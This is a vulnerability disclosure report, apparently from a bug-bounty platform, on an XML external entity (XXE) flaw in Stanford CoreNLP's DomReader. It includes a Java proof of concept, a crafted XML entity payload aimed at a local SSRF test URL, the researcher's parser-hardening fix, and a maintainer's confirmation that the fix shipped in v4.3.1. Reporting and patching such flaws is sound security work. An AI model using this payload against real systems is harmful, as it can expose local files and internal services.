Improper Restriction of XML External Entity Reference in stanfordnlp/corenlp

Valid

Reported on

Oct 11th 2021


Description

The Stanford CoreNLP package provides a set of natural language analysis tools written in Java, is using a vulnerable XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the readDocument() function in the "DomReader.java" file may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.

Proof of Concept

import java.io.File;
import java.io.FileInputStream;
import java.io.InputStream;

import edu.stanford.nlp.ie.machinereading.common.*;


public class Poc {
    @SuppressWarnings({ "unused" })
    public static void main(String[] args) {        
        try {
            File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample_ssrf.xml");
            DomReader obj = new DomReader();
            obj.readDocument(file);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

sample_ssrf.xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1:8800/test.txt">]>
<foo>&xxe;</foo>
We have contacted a member of the stanfordnlp/corenlp team and are waiting to hear back 2 months ago
2 months ago
2 months ago
2 months ago
Srikanth Prathi
2 months ago

Researcher


Unable to push a fix for two files in a single PR. Please find the below fix for the "src/edu/stanford/nlp/ie/machinereading/common/DomReader.java"

https://github.com/srikanthprathi/CoreNLP/pull/2

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); factory.setFeature("http://xml.org/sax/features/external-general-entities", false); factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false); factory.setFeature("http://apache.org/xml/features/dom/create-entity-ref-nodes", false); factory.setFeature("http://xml.org/sax/features/external-general-entities", false);

stanfordnlp/corenlp maintainer validated this vulnerability 2 months ago
Srikanth Prathi has been awarded the disclosure bounty
The fix bounty is now up for grabs
stanfordnlp/corenlp maintainer
2 months ago

https://github.com/stanfordnlp/CoreNLP/pull/1203

stanfordnlp/corenlp maintainer confirmed that a fix has been merged on e5bbe1 2 months ago
The fix bounty has been dropped
Ssurgeon.java#L455 has been validated
stanfordnlp/corenlp maintainer
a month ago

Thanks for this report and patch. This issue has been patched in CoreNLP v4.3.1.

Srikanth Prathi
a month ago

Researcher


You are welcome @stanfordnlp/corenlp